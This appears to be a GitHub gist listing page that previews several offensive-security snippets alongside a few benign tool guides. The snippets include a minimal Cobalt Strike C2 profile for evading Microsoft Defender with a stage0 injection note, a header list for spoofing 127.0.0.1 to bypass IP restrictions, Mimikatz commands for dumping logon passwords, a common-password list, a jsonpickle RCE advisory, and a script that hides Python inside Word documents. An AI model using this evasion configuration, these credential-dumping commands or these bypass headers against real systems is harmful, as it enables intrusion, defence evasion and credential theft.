Skip to content

Instantly share code, notes, and snippets.

View Anon-Exploiter's full-sized avatar
🎯
Making Memes & writing code :)

Syed Umar Arfeen Anon-Exploiter

🎯
Making Memes & writing code :)
View GitHub Profile
@miticollo
miticollo / How-to-build-frida-server-for-ios.md
Last active May 25, 2024 06:20
How to build frida server for iOS jailbroken devices

Here, I'll show you how to compile Frida for both rootfull and rootless jailbreaks.

TL;DR

On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).

The DEBs you will install are build using the following instructions.

Update 2024-02-29

@tothi
tothi / minimal-defender-bypass.profile
Last active May 5, 2024 01:05
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@kaimi-
kaimi- / gist:6b3c99538dce9e3d29ad647b325007c1
Last active May 2, 2024 08:29
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
@j0lt-github
j0lt-github / jsonpickle_vulnerable.txt
Last active August 7, 2021 13:00
jsonpickle 1.4.2 vulnerable to RCE
Description: JsonPickle 1.4.2 allows remote code execution during deserialization of a malicious payload through the decode() function.
VulnerabilityType: CWE-502: Deserialization of Untrusted Data
Vendor of Product: https://github.com/jsonpickle/jsonpickle
Affected Product Code Base: JsonPickle Python Module
Attack Type: Remote
Impact Code execution : True
@insi2304
insi2304 / Mimikatz-cheatsheet
Created July 23, 2020 08:15
Mimikatz Cheat Sheet
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
@claui
claui / install_jtool2.sh
Last active May 26, 2024 10:18
How to install Jonathan Levin’s jtool2 on macOS 11.0 (Apple Silicon)
# Copy and paste the following snippet, including brackets, into the Terminal
(
set -e;
cd "$(mktemp -d)"
curl -LO 'http://www.newosxbook.com/tools/jtool2.tgz'
tar -x -f jtool2.tgz
lipo jtool2 -thin x86_64 -output jtool2.x86_64
lipo disarm -thin x86_64 -output disarm.x86_64
sudo mkdir -p /usr/local/bin
@ignis-sec
ignis-sec / bb-foxyproxy-pattern.json
Created June 24, 2020 09:06
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
@ignis-sec
ignis-sec / ignis-top-100-most-common.txt
Created June 21, 2020 08:19
Top 100 most common passwords from old public db leaks.
Password | Occurrence
_____________|____________
123456 |5377325
123456789 |1962160
password |1190534
qwerty |869629
12345678 |703220
12345 |679886
123123 |460430
1234 |448199
@keyboardcrunch
keyboardcrunch / pydocexec.py
Created April 30, 2020 02:24
Injects a python script inside a word document so the doc can be executed with python :)
#!/usr/bin/python3
import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile
def stuffer(py_file, doc_file):